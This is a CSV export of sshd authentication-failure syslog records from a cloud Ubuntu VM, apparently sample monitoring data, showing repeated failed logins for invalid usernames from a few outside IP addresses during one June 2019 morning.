+15886,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:33:14,UbuntuDevEnv,2019-06-26 06:33:14,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.55.190.46,30960,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.55.190.4,,0,
+15887,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:33:14,UbuntuDevEnv,2019-06-26 06:33:14,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,30960,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15888,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:33:16,UbuntuDevEnv,2019-06-26 06:33:16,auth,UbuntuDevEnv,info,Failed password for invalid user ourhomes from 45.55.190.46 port 50500 ssh2,30960,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ourhomes,45.55.190.4,50500,,
+15889,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:33:16,UbuntuDevEnv,2019-06-26 06:33:16,auth,UbuntuDevEnv,info,Disconnected from invalid user ourhomes 45.55.190.46 port 50500 [preauth],30960,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ourhomes,45.55.190.4,50500,,
+15890,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:33:16,UbuntuDevEnv,2019-06-26 06:33:16,auth,UbuntuDevEnv,info,Received disconnect from 45.55.190.46 port 50500:11: Bye Bye [preauth],30960,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.55.190.4,50500,,
+15891,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:33:33,UbuntuDevEnv,2019-06-26 06:33:33,auth,UbuntuDevEnv,info,Invalid user oralce from 45.59.69.138 port 33850,31124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oralce,45.59.69.1,33850,,
+15892,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:33:33,UbuntuDevEnv,2019-06-26 06:33:33,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.59.69.138,31124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.59.69.1,,0,
+15893,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:33:33,UbuntuDevEnv,2019-06-26 06:33:33,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,31124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15894,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:33:36,UbuntuDevEnv,2019-06-26 06:33:35,auth,UbuntuDevEnv,info,Failed password for invalid user oralce from 45.59.69.138 port 33850 ssh2,31124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oralce,45.59.69.1,33850,,
+15895,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:33:36,UbuntuDevEnv,2019-06-26 06:33:35,auth,UbuntuDevEnv,info,Received disconnect from 45.59.69.138 port 33850:11: Bye Bye [preauth],31124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.59.69.1,33850,,
+15896,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:33:36,UbuntuDevEnv,2019-06-26 06:33:35,auth,UbuntuDevEnv,info,Disconnected from invalid user oralce 45.59.69.138 port 33850 [preauth],31124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oralce,45.59.69.1,33850,,
+15897,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:33:40,UbuntuDevEnv,2019-06-26 06:33:40,auth,UbuntuDevEnv,info,Invalid user qian from 139.99.98.248 port 34186,31150,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qian,139.99.98.2,34186,,
+15898,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:33:40,UbuntuDevEnv,2019-06-26 06:33:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.99.98.248,31150,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.99.98.2,,0,
+15899,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:33:40,UbuntuDevEnv,2019-06-26 06:33:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,31150,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15900,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:33:42,UbuntuDevEnv,2019-06-26 06:33:42,auth,UbuntuDevEnv,info,Failed password for invalid user qian from 139.99.98.248 port 34186 ssh2,31150,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qian,139.99.98.2,34186,,
+15901,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:33:42,UbuntuDevEnv,2019-06-26 06:33:42,auth,UbuntuDevEnv,info,Disconnected from invalid user qian 139.99.98.248 port 34186 [preauth],31150,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qian,139.99.98.2,34186,,
+15902,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:33:42,UbuntuDevEnv,2019-06-26 06:33:42,auth,UbuntuDevEnv,info,Received disconnect from 139.99.98.248 port 34186:11: Bye Bye [preauth],31150,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.99.98.2,34186,,
+15903,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:35:08,UbuntuDevEnv,2019-06-26 06:35:08,auth,UbuntuDevEnv,info,Invalid user andrew from 45.59.69.138 port 51428,31462,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,andrew,45.59.69.1,51428,,
+15904,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:35:08,UbuntuDevEnv,2019-06-26 06:35:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,31462,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15905,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:35:08,UbuntuDevEnv,2019-06-26 06:35:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.59.69.138,31462,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.59.69.1,,0,
+15906,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:35:10,UbuntuDevEnv,2019-06-26 06:35:10,auth,UbuntuDevEnv,info,Failed password for invalid user andrew from 45.59.69.138 port 51428 ssh2,31462,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,andrew,45.59.69.1,51428,,
+15907,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:35:11,UbuntuDevEnv,2019-06-26 06:35:10,auth,UbuntuDevEnv,info,Received disconnect from 45.59.69.138 port 51428:11: Bye Bye [preauth],31462,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.59.69.1,51428,,
+15908,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:35:11,UbuntuDevEnv,2019-06-26 06:35:10,auth,UbuntuDevEnv,info,Disconnected from invalid user andrew 45.59.69.138 port 51428 [preauth],31462,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,andrew,45.59.69.1,51428,,
+15909,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:35:25,UbuntuDevEnv,2019-06-26 06:35:24,auth,UbuntuDevEnv,info,Invalid user tinkerware from 139.99.98.248 port 51330,31524,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tinkerware,139.99.98.2,51330,,
+15910,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:35:25,UbuntuDevEnv,2019-06-26 06:35:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.99.98.248,31524,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.99.98.2,,0,
+15911,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:35:25,UbuntuDevEnv,2019-06-26 06:35:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,31524,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15912,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:35:26,UbuntuDevEnv,2019-06-26 06:35:26,auth,UbuntuDevEnv,info,Failed password for invalid user tinkerware from 139.99.98.248 port 51330 ssh2,31524,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tinkerware,139.99.98.2,51330,,
+15913,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:35:26,UbuntuDevEnv,2019-06-26 06:35:26,auth,UbuntuDevEnv,info,Disconnected from invalid user tinkerware 139.99.98.248 port 51330 [preauth],31524,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tinkerware,139.99.98.2,51330,,
+15914,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:35:26,UbuntuDevEnv,2019-06-26 06:35:26,auth,UbuntuDevEnv,info,Received disconnect from 139.99.98.248 port 51330:11: Bye Bye [preauth],31524,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.99.98.2,51330,,
+15915,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:36:42,UbuntuDevEnv,2019-06-26 06:36:42,auth,UbuntuDevEnv,info,Invalid user srikanth from 45.59.69.138 port 40766,31802,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,srikanth,45.59.69.1,40766,,
+15916,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:36:42,UbuntuDevEnv,2019-06-26 06:36:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.59.69.138,31802,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.59.69.1,,0,
+15917,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:36:42,UbuntuDevEnv,2019-06-26 06:36:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,31802,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15918,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:36:44,UbuntuDevEnv,2019-06-26 06:36:44,auth,UbuntuDevEnv,info,Failed password for invalid user srikanth from 45.59.69.138 port 40766 ssh2,31802,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,srikanth,45.59.69.1,40766,,
+15919,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:36:44,UbuntuDevEnv,2019-06-26 06:36:44,auth,UbuntuDevEnv,info,Received disconnect from 45.59.69.138 port 40766:11: Bye Bye [preauth],31802,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.59.69.1,40766,,
+15920,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:36:44,UbuntuDevEnv,2019-06-26 06:36:44,auth,UbuntuDevEnv,info,Disconnected from invalid user srikanth 45.59.69.138 port 40766 [preauth],31802,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,srikanth,45.59.69.1,40766,,
+15921,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:37:10,UbuntuDevEnv,2019-06-26 06:37:09,auth,UbuntuDevEnv,info,Invalid user testuser from 139.99.98.248 port 40248,31898,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testuser,139.99.98.2,40248,,
+15922,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:37:10,UbuntuDevEnv,2019-06-26 06:37:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.99.98.248,31898,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.99.98.2,,0,
+15923,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:37:10,UbuntuDevEnv,2019-06-26 06:37:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,31898,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15924,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:37:12,UbuntuDevEnv,2019-06-26 06:37:11,auth,UbuntuDevEnv,info,Failed password for invalid user testuser from 139.99.98.248 port 40248 ssh2,31898,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testuser,139.99.98.2,40248,,
+15925,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:37:12,UbuntuDevEnv,2019-06-26 06:37:11,auth,UbuntuDevEnv,info,Disconnected from invalid user testuser 139.99.98.248 port 40248 [preauth],31898,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testuser,139.99.98.2,40248,,
+15926,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:37:12,UbuntuDevEnv,2019-06-26 06:37:11,auth,UbuntuDevEnv,info,Received disconnect from 139.99.98.248 port 40248:11: Bye Bye [preauth],31898,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.99.98.2,40248,,
+15927,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:37:32,UbuntuDevEnv,2019-06-26 06:37:32,auth,UbuntuDevEnv,info,Invalid user user from 138.68.29.52 port 37914,31975,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,138.68.29.5,37914,,
+15928,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:37:32,UbuntuDevEnv,2019-06-26 06:37:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.29.52,31975,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.29.5,,0,
+15929,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:37:32,UbuntuDevEnv,2019-06-26 06:37:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,31975,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15930,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:37:34,UbuntuDevEnv,2019-06-26 06:37:34,auth,UbuntuDevEnv,info,Failed password for invalid user user from 138.68.29.52 port 37914 ssh2,31975,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,138.68.29.5,37914,,
+15931,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:37:34,UbuntuDevEnv,2019-06-26 06:37:34,auth,UbuntuDevEnv,info,Disconnected from invalid user user 138.68.29.52 port 37914 [preauth],31975,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,138.68.29.5,37914,,
+15932,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:37:34,UbuntuDevEnv,2019-06-26 06:37:34,auth,UbuntuDevEnv,info,Received disconnect from 138.68.29.52 port 37914:11: Bye Bye [preauth],31975,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.29.5,37914,,
+15933,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:38:16,UbuntuDevEnv,2019-06-26 06:38:15,auth,UbuntuDevEnv,info,Invalid user elizabeth from 45.59.69.138 port 58332,32135,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,elizabeth,45.59.69.1,58332,,
+15934,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:38:16,UbuntuDevEnv,2019-06-26 06:38:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,32135,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15935,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:38:16,UbuntuDevEnv,2019-06-26 06:38:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.59.69.138,32135,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.59.69.1,,0,
+15936,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:38:18,UbuntuDevEnv,2019-06-26 06:38:17,auth,UbuntuDevEnv,info,Failed password for invalid user elizabeth from 45.59.69.138 port 58332 ssh2,32135,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,elizabeth,45.59.69.1,58332,,
+15937,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:38:18,UbuntuDevEnv,2019-06-26 06:38:17,auth,UbuntuDevEnv,info,Received disconnect from 45.59.69.138 port 58332:11: Bye Bye [preauth],32135,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.59.69.1,58332,,
+15938,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:38:18,UbuntuDevEnv,2019-06-26 06:38:17,auth,UbuntuDevEnv,info,Disconnected from invalid user elizabeth 45.59.69.138 port 58332 [preauth],32135,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,elizabeth,45.59.69.1,58332,,
+15939,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:38:56,UbuntuDevEnv,2019-06-26 06:38:56,auth,UbuntuDevEnv,info,Invalid user 2 from 139.99.98.248 port 57392,32274,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,2,139.99.98.2,57392,,
+15940,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:38:56,UbuntuDevEnv,2019-06-26 06:38:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,32274,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15941,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:38:56,UbuntuDevEnv,2019-06-26 06:38:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.99.98.248,32274,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.99.98.2,,0,
+15942,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:38:59,UbuntuDevEnv,2019-06-26 06:38:58,auth,UbuntuDevEnv,info,Failed password for invalid user 2 from 139.99.98.248 port 57392 ssh2,32274,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,2,139.99.98.2,57392,,
+15943,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:38:59,UbuntuDevEnv,2019-06-26 06:38:58,auth,UbuntuDevEnv,info,Disconnected from invalid user 2 139.99.98.248 port 57392 [preauth],32274,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,2,139.99.98.2,57392,,
+15944,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:38:59,UbuntuDevEnv,2019-06-26 06:38:58,auth,UbuntuDevEnv,info,Received disconnect from 139.99.98.248 port 57392:11: Bye Bye [preauth],32274,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.99.98.2,57392,,
+15945,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:39:08,UbuntuDevEnv,2019-06-26 06:39:08,auth,UbuntuDevEnv,info,Invalid user colord from 46.101.149.230 port 53930,32320,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,colord,46.101.149.2,53930,,
